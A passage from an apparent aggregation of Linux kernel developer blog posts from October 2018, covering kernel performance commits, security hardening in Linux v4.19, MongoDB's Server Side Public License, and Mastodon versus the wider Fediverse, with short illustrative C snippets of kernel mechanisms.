Automatic NUMA Balancing uses a multi-stage pass to decide whether a page should migrate to a local node. This filter avoids excessive ping-ponging if a page is shared or used by threads that migrate cross-node frequently. Threads inherit both page tables and the preferred node ID from the parent, which means that threads can trigger hinting faults earlier than a new task, which delays scanning for a number of seconds. Since a thread can be load-balanced very early in its lifetime, there can be an unnecessary delay before it starts migrating thread-local data. This patch migrates private pages faster early in the lifetime of a thread, using the sequence counter as an identifier of new tasks.
[Commit 37355bdc5a12]

rcu: check if GP already requested

This commit makes rcu_nocb_wait_gp() check to see if the current CPU already knows about the needed grace period having already been requested.  If so, it avoids acquiring the corresponding leaf rcu_node structure's lock, thus decreasing contention.  This optimization is intended for cases where either multiple leader rcu kthreads are running on the same CPU or these kthreads are running on a non-offloaded (e.g., housekeeping) CPU.
[Commit ab5e869c1f7a]

cpufreq/schedutil: take into account time spent in irq

Time spent in interrupt handlers was not being accounted for in the CPU utilization used when selecting an operating performance point. This can be a significant amount of time, which is reported in the normal context time window. The new CPU utilization calculation yields a 10% performance boost on iperf workloads.
[Commit 9033ea11889f]

mm/page_alloc: enlarge zone's batch size

The page allocator will first try to use a percpu set of pages, and if those are all used up, ask the Buddy allocator for a batch of pages. The size of this batch has a number of consequences, including for performance. The last time this magic number was increased was 13 years ago, and there have been numerous hardware improvements since then. A recent study with allocator-intensive benchmarks shows that doubling the size of the batch can yield improvements on larger, modern machines.
[Commit d8a759b57035]

mm: skip invalid pages block at a time in zero_resv_unresv()

The role of zero_resv_unavail() is to make sure that every struct page that is allocated but is not backed by memory that is accessible by kernel is zeroed and not in some uninitialized state. Since struct pages are allocated in blocks we can skip pageblock_nr_pages at a time, when the first one is found to be invalid. This optimization may help since now on x86 every hole in e820 maps is marked as reserved in memblock, and thus will go through this function.
[Commit 720e14ebec64]

kvm, x86: implement paravirt "send IPI" hypercall

Replace sending IPIs one by one for xAPIC physical mode by a single hypercall (vmexit). This patchset lets a guest send multicast IPIs, with at most 128 destinations per hypercall in 64-bit mode and 64 vCPUs per hypercall in 32-bit mode. An IPI microbenchmark shows non-trivial performance improvements for broadcast IPIs (send IPI to all online CPUs and force them to take/drop a spinlock).
[Commit 4180bf1b655a]

arm64: use queued spinlocks

Similar to x86, replace the old ticket spinlocks with fair qspinlocks, gaining the MCS lock's properties as well as better performance under virtualization. This is particularly suitable for larger multicore machines.
[Commit c11090474d70]

October 25, 2018 06:19 PM

October 22, 2018

Kees Cook: security things in Linux v4.19

Previously: v4.18.

Linux kernel v4.19 was released today. Here are some security-related things I found interesting:

L1 Terminal Fault (L1TF)

While it seems like ages ago, the fixes for L1TF actually landed at the start of the v4.19 merge window. As with the other speculation flaw fixes, lots of people were involved, and the scope was pretty wide: bare metal machines, virtualized machines, etc. LWN has a great write-up on the L1TF flaw and the kernel’s documentation on L1TF defenses is equally detailed. I like how clean the solution is for bare-metal machines: when a page table entry should be marked invalid, instead of only changing the “Present” flag, it also inverts the address portion so even a speculative lookup ignoring the “Present” flag will land in an unmapped area.
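
The PTE inversion can be sketched in a few lines (illustrative only; the real code is in arch/x86/include/asm/pgtable-invert.h, and the mask below is my simplification):

    #define PTE_PFN_MASK 0x000ffffffffff000UL  /* x86-64 PFN bits */

    /* Clear Present (bit 0) and invert the PFN portion, so a
     * speculative lookup that ignores Present points at unmapped
     * address space instead of a real physical page. */
    static unsigned long pte_mark_invalid(unsigned long pte)
    {
        return (pte ^ PTE_PFN_MASK) & ~1UL;
    }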

protected regular and fifo files

Salvatore Mesoraca implemented an O_CREAT restriction in /tmp directories for FIFOs and regular files. This is similar to the existing symlink restrictions, which take effect in sticky world-writable directories (e.g. /tmp) when the opening user does not match the owner of the existing file (or directory). When a program opens a FIFO or regular file with O_CREAT and this kind of user mismatch, it is treated as if it had also been opened with O_EXCL: it gets rejected because there is already a file there, and the kernel wants to protect the program from writing possibly sensitive contents to a file owned by a different user. This has become a more common attack vector now that symlink and hardlink races have been eliminated.
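
From userspace, the new behavior (controlled by the protected_regular and protected_fifos sysctls under /proc/sys/fs/) looks roughly like this; the file name is hypothetical:

    #include <fcntl.h>
    #include <stdio.h>

    int main(void)
    {
        /* Assume /tmp/trap already exists and is owned by another
         * user. With the protection enabled, this O_CREAT open is
         * rejected as if O_EXCL had been passed. */
        int fd = open("/tmp/trap", O_CREAT | O_WRONLY, 0600);

        if (fd < 0)
            perror("open");     /* rejected by the new check */
        return 0;
    }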

syscall register clearing, arm64

One of the ways attackers can influence potential speculative execution flaws in the kernel is to leak information into the kernel via “unused” register contents. Most syscalls take only a few arguments, so all the other calling-convention-defined registers can be cleared instead of just left with whatever contents they had in userspace. As it turns out, clearing registers is very fast. Similar to what was done on x86, Mark Rutland implemented a full register-clearing syscall wrapper on arm64.

Variable Length Array removals, part 3

As mentioned in part 1 and part 2, VLAs continue to be removed from the kernel. While CONFIG_THREAD_INFO_IN_TASK and CONFIG_VMAP_STACK cover most issues with stack exhaustion attacks, not all architectures have those features, so getting rid of VLAs makes sure we keep a few classes of flaws out of all kernel architectures and configurations. It’s been a long road, and it’s shaping up to be a 4-part saga with the remaining VLA removals landing in the next kernel. For v4.19, several folks continued to help grind away at the problem: Arnd Bergmann, Kyle Spiers, Laura Abbott, Martin Schwidefsky, Salvatore Mesoraca, and myself.

shift overflow helper

Jason Gunthorpe noticed that while the kernel recently gained add/sub/mul/div helpers to check for arithmetic overflow, we didn’t have anything for shift-left. He added check_shl_overflow() to round out the toolbox, and Leon Romanovsky immediately put it to use to solve an overflow in RDMA.
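
Usage is symmetrical with the other helpers in <linux/overflow.h>: the macro returns true if the shift would overflow the destination. The surrounding function here is made up for illustration:

    #include <linux/overflow.h>
    #include <linux/errno.h>
    #include <linux/types.h>

    static int set_ring_size(u32 requested_shift, u32 *nelems)
    {
        /* true means 1 << requested_shift does not fit in *nelems */
        if (check_shl_overflow(1U, requested_shift, nelems))
            return -EINVAL;

        return 0;
    }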

Edit: I forgot to mention this next feature when I first posted:

trusted architecture-supported RNG initialization

The Random Number Generator in the kernel seeds its pools from many entropy sources, including any architecture-specific sources (e.g. x86’s RDRAND). Due to many people not wanting to trust the architecture-specific source due to the inability to audit its operation, entropy from those sources was not credited to RNG initialization, which wants to gather “enough” entropy before claiming to be initialized. However, because some systems don’t generate enough entropy at boot time, it was taking a while to gather enough system entropy (e.g. from interrupts) before the RNG became usable, which might block userspace from starting (e.g. systemd wants to get early entropy). To help these cases, Ted Ts’o introduced a toggle to trust the architecture-specific entropy completely (i.e. RNG is considered fully initialized as soon as it gets the architecture-specific entropy). To use this, the kernel can be built with CONFIG_RANDOM_TRUST_CPU=y (or booted with “random.trust_cpu=on“).

That’s it for now; thanks for reading. The merge window is open for v4.20! Wish us luck. :)

© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

October 22, 2018 11:17 PM

October 16, 2018

Matthew Garrett: Initial thoughts on MongoDB's new Server Side Public License

MongoDB just announced that they were relicensing under their new Server Side Public License. This is basically the Affero GPL except with section 13 largely replaced with new text, as follows:

If you make the functionality of the Program or a modified version available to third parties as a service, you must make the Service Source Code available via network download to everyone at no charge, under the terms of this License. Making the functionality of the Program or modified version available to third parties as a service includes, without limitation, enabling third parties to interact with the functionality of the Program or modified version remotely through a computer network, offering a service the value of which entirely or primarily derives from the value of the Program or modified version, or offering a service that accomplishes for users the primary purpose of the Software or modified version.

“Service Source Code” means the Corresponding Source for the Program or the modified version, and the Corresponding Source for all programs that you use to make the Program or modified version available as a service, including, without limitation, management software, user interfaces, application program interfaces, automation software, monitoring software, backup software, storage software and hosting software, all such that a user could run an instance of the service using the Service Source Code you make available.


MongoDB admit that this license is not currently open source in the sense of being approved by the Open Source Initiative, but say: “We believe that the SSPL meets the standards for an open source license and are working to have it approved by the OSI.”

At the broadest level, AGPL requires you to distribute the source code to the AGPLed work[1] while the SSPL requires you to distribute the source code to everything involved in providing the service. Having a license place requirements around things that aren't derived works of the covered code is unusual but not entirely unheard of - the GPL requires you to provide build scripts even if they're not strictly derived works, and you could probably make an argument that the anti-Tivoisation provisions of GPL3 fall into this category.

A stranger point is that you're required to provide all of this under the terms of the SSPL. If you have any code in your stack that can't be released under those terms then it's literally impossible for you to comply with this license. I'm not a lawyer, so I'll leave it up to them to figure out whether this means you're now only allowed to deploy MongoDB on BSD because the license would require you to relicense Linux away from the GPL. This feels sloppy rather than deliberate, but if it is deliberate then it's a massively greater reach than any existing copyleft license.

You can definitely make arguments that this is just a maximalist copyleft license, the AGPL taken to extreme, and therefore it fits the open source criteria. But there's a point where something is so far from the previously accepted scenarios that it's actually something different, and should be examined as a new category rather than already approved categories. I suspect that this license has been written to conform to a strict reading of the Open Source Definition, and that any attempt by OSI to declare it as not being open source will receive pushback. But definitions don't exist to be weaponised against the communities that they seek to protect, and a license that has overly onerous terms should be rejected even if that means changing the definition.

In general I am strongly in favour of licenses ensuring that users have the freedom to take advantage of modifications that people have made to free software, and I'm a fan of the AGPL. But my initial feeling is that this license is a deliberate attempt to make it practically impossible to take advantage of the freedoms that the license nominally grants, and this impression is strengthened by it being something that's been announced with immediate effect rather than something that's been developed with community input. I think there's a bunch of worthwhile discussion to have about whether the AGPL is strong and clear enough to achieve its goals, but I don't think that this SSPL is the answer to that - and I lean towards thinking that it's not a good faith attempt to produce a usable open source license.

(It should go without saying that this is my personal opinion as a member of the free software community, and not that of my employer)

[1] There's some complexities around GPL3 code that's incorporated into the AGPLed work, but if it's not part of the AGPLed work then it's not covered


October 16, 2018 10:44 PM

October 15, 2018

Davidlohr Bueso: Linux v4.18: Performance Goodies

Linux v4.18 has been out for two months now, making this post a bit late, but still in time before the next release. Also, there was so much drama around the CoC that it was hard to care about performance topics :P As always, the release comes with a series of performance enhancements and optimizations across subsystems.

locking: avoid pointless TEST instructions

A number of places within the locking primitives have been optimized to avoid superfluous TEST instructions on the CAS return value by relying on try_cmpxchg, generating slightly better code for x86-64 (for arm64 there is really no difference). Such is the case for the mutex fastpath (uncontended case) and queued spinlocks.
[Commit c427f69564e2, ae75d9089ff7]
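
The idiom, sketched on a made-up lock structure (not the exact kernel patch):

    #include <linux/atomic.h>

    struct lock_sketch { atomic_long_t owner; };

    static void set_owner(struct lock_sketch *lock, long new)
    {
        long old = atomic_long_read(&lock->owner);

        /*
         * cmpxchg() returns the old value, forcing a separate compare
         * (an extra TEST on x86). try_cmpxchg() returns a boolean and
         * refreshes 'old' on failure, so the compiler can branch
         * directly on the flags set by the CMPXCHG instruction.
         */
        while (!atomic_long_try_cmpxchg_acquire(&lock->owner, &old, new))
            cpu_relax();
    }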

locking/mcs: optimize cpu spinning

Some architectures, such as arm64, can enter a low-power standby state (spin-waiting) instead of purely spinning on a condition. This is applied to the MCS spin loop, which in turn directly helps queued spinlocks. On x86, this can also be cheaper than spinning on smp_load_acquire().
[Commit 7f56b58a92aa]
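
As a rough userspace illustration of the idea (all names hypothetical; the kernel's arm64 smp_cond_load_acquire() goes further, arming the exclusive monitor with LDXR and parking the CPU in WFE until the cacheline changes, which is stronger than the yield/pause hints used here):

    #include <stdatomic.h>

    #if defined(__x86_64__)
    # define cpu_relax() __builtin_ia32_pause()
    #elif defined(__aarch64__)
    # define cpu_relax() __asm__ __volatile__("yield" ::: "memory")
    #else
    # define cpu_relax() ((void)0)
    #endif

    /* Spin until *flag becomes nonzero, giving the CPU a standby hint on
     * each iteration instead of hammering the load. */
    static int spin_until_set(const _Atomic int *flag)
    {
            int v;
            while (!(v = atomic_load_explicit(flag, memory_order_acquire)))
                    cpu_relax();
            return v;
    }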

mm/mremap: reduce amount of TLB shootdowns

It was discovered that on an mremap-heavy workload the number of TLB flushes was excessive, causing overall performance issues. By removing the LATENCY_LIMIT magic number and handling TLB flushes on a PMD boundary instead of every 64 pages, the number of shootdowns can be reduced by a factor of 8 in the ideal case. The LATENCY_LIMIT was almost certainly introduced to limit PTL hold times, but the latency savings are likely overshadowed by the cost of the IPIs in many cases.
[Commit 37a4094e828f]
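
The factor of 8 is just the ratio of the chunk sizes: the old cap was 64 pages (256 KiB) per flush, while a PMD covers 2 MiB. A toy model of the flush counts (back-of-the-envelope arithmetic, not kernel code):

    #include <stdio.h>

    #define PAGE_SIZE     4096UL
    #define PMD_SIZE      (2UL << 20)           /* 2 MiB */
    #define LATENCY_LIMIT (64UL * PAGE_SIZE)    /* the old 64-page cap */

    /* One shootdown per chunk moved. */
    static unsigned long flushes(unsigned long len, unsigned long chunk)
    {
            return (len + chunk - 1) / chunk;
    }

    int main(void)
    {
            unsigned long len = 32UL << 20;     /* a 32 MiB mremap */
            printf("old: %lu flushes, new: %lu flushes\n",
                   flushes(len, LATENCY_LIMIT), flushes(len, PMD_SIZE));
            return 0;   /* prints "old: 128 flushes, new: 16 flushes" */
    }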

mm: replace mmap_sem to protect cmdline and environ procfs files

Reducing (ab)users of mmap_sem is always good for general address-space performance. A new mm->arg_lock is introduced to protect against races when handling the /proc/$PID/{cmdline,environ} files, (mostly) removing the need for the semaphore there.
[Commit 88aa7cc688d4]
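
A userspace analogue of the change, with pthreads standing in for the kernel locks (types and names are illustrative):

    #include <pthread.h>

    struct mm_like {
            pthread_rwlock_t mmap_sem;      /* big, heavily contended lock */
            pthread_mutex_t  arg_lock;      /* new: covers only the fields below */
            unsigned long arg_start, arg_end;
    };

    /* Readers of /proc/$PID/cmdline no longer queue behind mmap_sem. */
    static unsigned long cmdline_len(struct mm_like *mm)
    {
            pthread_mutex_lock(&mm->arg_lock);
            unsigned long len = mm->arg_end - mm->arg_start;
            pthread_mutex_unlock(&mm->arg_lock);
            return len;
    }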

mm/hugetlb: make better use of page clearing optimization

The fault address (the address of the sub-page being accessed) is now passed down to the no-page fault handler to make better use of the general huge page clearing optimization. This allows the sub-page being accessed to be cleared last, so that its cache lines are not evicted while the other sub-pages are cleared. Throughput improvements of ~30% were reported for the vm-scalability anon-w-seq workload under hugetlbfs.
[Commit 285b8dcaacfc]
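
The core idea fits in a few lines; here is a simplified standalone sketch (the kernel version is fancier, also ordering the other sub-pages to radiate away from the target):

    #include <string.h>
    #include <stddef.h>

    #define HPAGE_SIZE (2UL << 20)
    #define SUBPAGE    4096UL

    /* Zero a huge page in sub-page chunks, deferring the chunk that the
     * faulting access targets until last, so its cache lines are the
     * freshest when the fault returns. */
    static void clear_huge_page_target_last(char *page, size_t fault_off)
    {
            size_t target = fault_off / SUBPAGE;

            for (size_t i = 0; i < HPAGE_SIZE / SUBPAGE; i++) {
                    if (i != target)
                            memset(page + i * SUBPAGE, 0, SUBPAGE);
            }
            memset(page + target * SUBPAGE, 0, SUBPAGE);  /* hot one last */
    }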

sched: don't schedule threads on pre-empted vCPUs

The scheduler can now determine whether a vCPU is running and prioritize such CPUs when scheduling threads. If a vCPU has been preempted, a thread woken there incurs the extra cost of a VMENTER plus the wait until the vCPU is actually running on a host CPU again; if other vCPUs are idle and actually running on the host, threads should be scheduled there instead.
[Commit 247f2f6f3c70, 943d355d7fee]
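
A toy model of the placement policy (the arrays stand in for scheduler state and for what vcpu_is_preempted() would report; everything here is illustrative):

    #include <stdbool.h>

    #define NR_CPUS 8

    static bool cpu_idle[NR_CPUS];
    static bool vcpu_preempted[NR_CPUS];

    /* Prefer a CPU that is idle AND whose vCPU is running on the host;
     * an idle-but-preempted vCPU is only a fallback, since waking a task
     * there pays for a VMENTER plus the host scheduling delay. */
    static int pick_cpu(int prev)
    {
            int fallback = -1;

            for (int cpu = 0; cpu < NR_CPUS; cpu++) {
                    if (!cpu_idle[cpu])
                            continue;
                    if (!vcpu_preempted[cpu])
                            return cpu;
                    if (fallback < 0)
                            fallback = cpu;
            }
            return fallback >= 0 ? fallback : prev;
    }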

sched/numa: Stagger NUMA balancing scan periods for new threads

It is redundant and counter-productive for all threads sharing an address space to change protections in order to trap NUMA faults: potentially only one thread is required, but that thread may be idle, or it may have no locality concerns and pick an unsuitable scan rate. Threads now use independent scan periods, staggered based on the number of address-space users at the time the thread is created.

The intent is that threads will avoid scanning at the same time and have a chance to adapt their scan rate later if necessary. This reduces total scan activity early in the threads' lifetime. The difference in headline performance across a range of machines and workloads is marginal, but system CPU usage is reduced, as is overall scan activity.
[Commit 137844759843]
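
The staggering rule itself is simple; a sketch (the constants and the exact formula here are illustrative, not the kernel's):

    #include <stdint.h>

    #define MIN_SCAN_PERIOD_MS 1000u
    #define MAX_STAGGER        8u   /* cap so late threads aren't deferred forever */

    /* The Nth user of an address space delays its first NUMA scan by a
     * multiple of the minimum scan period, so siblings do not all change
     * protections and start faulting at the same time. */
    static uint64_t first_scan_delay_ms(unsigned int nr_mm_users)
    {
            return (uint64_t)(nr_mm_users % MAX_STAGGER) * MIN_SCAN_PERIOD_MS;
    }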

block/bfq: postpone rq preparation to insert or merge

A lock contention point is removed (see the patch for details and justification) by postponing request preparation to insertion or merge time, as the lock then no longer needs to be grabbed in the prepare_request hook.
[Commit 18e5a57d7987]

btrfs: improve rmdir performance for large directories

When checking whether a directory can be deleted, instead of verifying that all of its children have been processed every time, this optimization keeps track of the directory index offset of the last child checked in the previous call to can_rmdir(), and uses it as the starting point for future calls. The change was shown to yield massive performance benefits: for a test directory with two million files being deleted, the runtime dropped from half an hour to less than two seconds.
[Commit 0f96f517dcaa]
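
The caching idea in miniature (a sorted array of still-unprocessed child index offsets stands in for the on-disk directory items; all names are hypothetical):

    #include <stdbool.h>
    #include <stddef.h>

    struct rmdir_check {
            unsigned long last_checked;   /* resume point across calls */
    };

    /* Skip everything verified by earlier calls instead of rescanning
     * millions of entries from index zero every time. */
    static bool can_rmdir(struct rmdir_check *rc,
                          const unsigned long *pending, size_t n)
    {
            for (size_t i = 0; i < n; i++) {
                    if (pending[i] < rc->last_checked)
                            continue;             /* already verified */
                    rc->last_checked = pending[i];
                    return false;                 /* a child still blocks us */
            }
            return true;
    }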

KVM: VMX: Optimize tscdeadline timer latency

Support is added for advancing the tscdeadline expiration when the tscdeadline timer is emulated via the VMX preemption timer, reducing the hypervisor latency on the handle_preemption_timer -> vmentry path. The guest can also set an expiration that is very small; in that case delta_tsc is set to 0, leading to an immediate vmexit whenever delta_tsc is no bigger than the advance in nanoseconds. This reduces latency by ~63% for kvm-unit-tests/tscdeadline_latency when testing busy waits.
[Commit c5ce8235cffa]
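
The clamping arithmetic, in a hedged standalone form (names are illustrative):

    #include <stdint.h>

    /* Program the preemption timer `advance` cycles early so the
     * vmexit -> timer-injection -> vmentry path overlaps the tail of the
     * wait; a deadline closer than the advance clamps to 0, i.e. an
     * immediate vmexit. */
    static uint64_t preempt_timer_delta(uint64_t deadline_tsc,
                                        uint64_t now_tsc, uint64_t advance)
    {
            if (deadline_tsc <= now_tsc + advance)
                    return 0;
            return deadline_tsc - now_tsc - advance;
    }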

net/sched: NOLOCK qdisc performance enhancements and fixes

There have been various performance-related core changes to the NOLOCK qdisc code. The first reduces the atomic operations on __QDISC_STATE_RUNNING: in the uncontended scenario, with the packet rate below line rate, the bit was flipped twice per packet, once on packet dequeue and once on the next, failing dequeue attempt. The bit manipulation is moved into the qdisc_run_{begin,end} helpers, which simplifies the qdisc and flips the bit only once per packet, with a measurable performance improvement in the uncontended scenario.

Later on, the atomic approach was replaced with a sequence spinlock to address pfifo_fast performance regressions. There is also a reduction in the Qdisc struct's memory footprint (it spans one cacheline less).
[Commit 96009c7d500e, 021a17ed796b, e9be0e993d95]
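
The shape of the first change, as a userspace sketch with C11 atomics standing in for the kernel's bit operations (dequeue_one() is a stub; all names are illustrative):

    #include <stdatomic.h>
    #include <stdbool.h>

    static atomic_flag qdisc_running = ATOMIC_FLAG_INIT;

    static bool run_begin(void)
    {
            return !atomic_flag_test_and_set_explicit(&qdisc_running,
                                                      memory_order_acquire);
    }

    static void run_end(void)
    {
            atomic_flag_clear_explicit(&qdisc_running, memory_order_release);
    }

    static bool dequeue_one(void) { return false; }   /* stub */

    static void qdisc_run(void)
    {
            if (!run_begin())
                    return;     /* another CPU is already draining the queue */
            while (dequeue_one())
                    ;           /* RUNNING is touched once per run, not per packet */
            run_end();
    }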

lib/idr: improve scalability by reducing IDA lock granularity

Improve the scalability of the IDA by using the per-IDA xa_lock rather than the global simple_ida_lock. IDAs are not typically used in performance-sensitive locations, but since we have this lock anyway, we can use it.
[Commit b94078e69533]
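
A userspace analogue of the locking change (the real code reuses the xarray's internal xa_lock rather than adding a field; this struct is illustrative):

    #include <pthread.h>

    struct ida_like {
            pthread_mutex_t xa_lock;    /* per-instance, not global */
            unsigned long next_id;
    };

    /* Two unrelated IDAs no longer serialize against each other the way
     * they did under the single global simple_ida_lock. */
    static unsigned long ida_like_alloc(struct ida_like *ida)
    {
            pthread_mutex_lock(&ida->xa_lock);
            unsigned long id = ida->next_id++;
            pthread_mutex_unlock(&ida->xa_lock);
            return id;
    }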

x86-64: micro-optimize __clear_user()

Using immediate constants saves two registers.
[Commit 1153933703d9]

arm64: select ARCH_HAS_FAST_MULTIPLIER

It is probably safe to assume that all Armv8-A implementations have a multiplier whose efficiency is comparable to, or better than, a sequence of three or so register-dependent arithmetic instructions. Selecting ARCH_HAS_FAST_MULTIPLIER gets ever-so-slightly nicer codegen in the few dusty old corners that care.
[Commit e75bef2a4fe2]
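
One of those dusty corners is the software population count: with a fast multiplier, the final horizontal sum of the per-byte counts becomes a single multiply-and-shift instead of a chain of dependent adds. The classic trick, standalone:

    /* Count set bits in a 32-bit word. */
    static unsigned int hweight32_mult(unsigned int w)
    {
            w -= (w >> 1) & 0x55555555;                        /* pairs */
            w  = (w & 0x33333333) + ((w >> 2) & 0x33333333);   /* nibbles */
            w  = (w + (w >> 4)) & 0x0f0f0f0f;                  /* bytes */
            return (w * 0x01010101) >> 24;   /* sum the bytes via multiply */
    }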

October 15, 2018 08:19 PM

October 11, 2018

Pete Zaitcev: I'd like to interject for a moment

In a comment on the death of G+, elisteran brought up something that has long annoyed me out of all proportion to its actual significance. What do you call a collection of servers communicating through NNTP? You don't call them "INN", you call them "Usenet". The system of hosts communicating through SMTP is not called "Exim", it is called "e-mail". But when someone wants to escape G+, they often consider "Mastodon". Isn't it odd?

Mastodon is merely an implementation of the Fediverse. As it happens, only one of my Fediverse channels runs on Mastodon (the Japanese-language one at Pawoo). My main one still uses Gnusocial, and the anime one was on Gnusocial and migrated to Pleroma a few months ago. All of them communicate using the OStatus protocol, although a movement is afoot to switch to ActivityPub. Hopefully it's more successful than the migration from RSS to Atom was.

Yet I've noticed that a lot of people fall for the idea that Mastodon is an exclusive brand. Rarely does one have to know or care what MTA someone else uses. Microsoft was somewhat successful in establishing Outlook as such a powerful brand, to the exclusion of compatible e-mail software. The maintainer of Mastodon is trying his hardest to present it as a similar brand, and regrettably, he's very successful at that.

I guess what really drives me mad about this is how Eugen uses his mindshare advantage to drive protocol extensions. All Fediverse implementations generally communicate freely with one another, but as Pleroma and Mastodon develop, they gradually leave Gnusocial behind in features. In particular, Eugen found a loophole in the protocol which allows attaching pictures without using up space in the message for the URL. When Gnusocial displays a message with an attachment, it only displays the text, not the picture. This actually used to be a server setting, for when you wanted to keep NSFW imagery off your instance and save a little bandwidth. But these days pictures are so prevalent that it's pretty much impossible to live without receiving them. In this, Eugen has completed the "extend" phase and is moving on to "extinguish".

I'm not sure if this is a lost cause by now. At least I hope that members of my social circle migrate to the Fediverse in general, and not to Mastodon from the outset. Of course, the implementation does matter when they make choices. As I mentioned, for anything but Linux discussions pictures are essential, so one cannot reasonably use a Gnusocial instance for anime, for example. And I can see some users liking Mastodon's UI. And Mastodon's native app support is better (or not). So yes, by all means, if you want to install Mastodon, or join an instance that's running Mastodon, be my guest. Just realize that Mastodon is an implementation of the Fediverse and not the Fediverse itself.

UPDATE 2019/02/11: Chris finds a silver lining.

October 11, 2018 01:16 PM